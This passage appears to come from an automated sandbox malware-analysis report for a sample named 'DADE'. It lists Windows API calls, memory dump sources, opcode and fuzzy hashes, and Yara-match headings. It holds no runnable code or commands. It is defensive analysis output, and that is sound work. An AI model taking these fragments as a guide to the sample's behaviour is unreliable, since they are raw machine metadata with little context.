                                                      • Opcode Fuzzy Hash: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
                                                      • Instruction Fuzzy Hash: 5E31EA75A41B42AFC724DF3AC984956B7E9FF88305704892EA456D3B60D774F810CF90
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 009F17E8
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009F1820
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009F1858
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009F1890
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
                                                      • Instruction ID: 11ebcec5841d6e27d11d3c93eece5a2092d0ac89fcd3a113f1b4d069e2e491f4
                                                      • Opcode Fuzzy Hash: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
                                                      • Instruction Fuzzy Hash: 4221F974601B068BD734DF2AC998B27B7F9EF44744B14491DE99AC7B40DB74E800CBA0
                                                      APIs
                                                        • Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
                                                        • Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
                                                        • Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0
                                                        • Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
                                                        • Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
                                                      • lstrcat.KERNEL32(00000000), ref: 009EC5BC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$SystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 3486790982-0
                                                      • Opcode ID: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
                                                      • Instruction ID: 186733ac8164942475734fc9cdba94be2aaf349664da27eba73dcb157813742a
                                                      • Opcode Fuzzy Hash: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
                                                      • Instruction Fuzzy Hash: D821ADB0D042899BCB11EFA5CC85BAEB7B9EF85305F188465E400AB251DB78ED02DB90
                                                      APIs
                                                      • memcpy.MSVCRT(?,?,00000040), ref: 00406E40
                                                      • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00406EBB
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapmemcpy$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1643994569-0
                                                      • Opcode ID: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
                                                      • Instruction ID: 021ca828da5bfa0a796bb6e6c33eee2a11837a2b1fb4363adf8c912b1a52eb88
                                                      • Opcode Fuzzy Hash: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
                                                      • Instruction Fuzzy Hash: 9A218CB06007029BEB248B21DC84BBB73E8EB40704F44447DEA47DB684EBB8E951CB95
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 0040152D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0040154F
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401571
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401593
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
                                                      • Instruction ID: 156e9cd4061fd8f5e73776b1d1d3add2ecf4c06161da7b3eeeca5abdbe74678b
                                                      • Opcode Fuzzy Hash: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
                                                      • Instruction Fuzzy Hash: 86111275A01B02ABDB14AF36D95C927B7F8BF44305304463EA457E7B90EB78E800CB94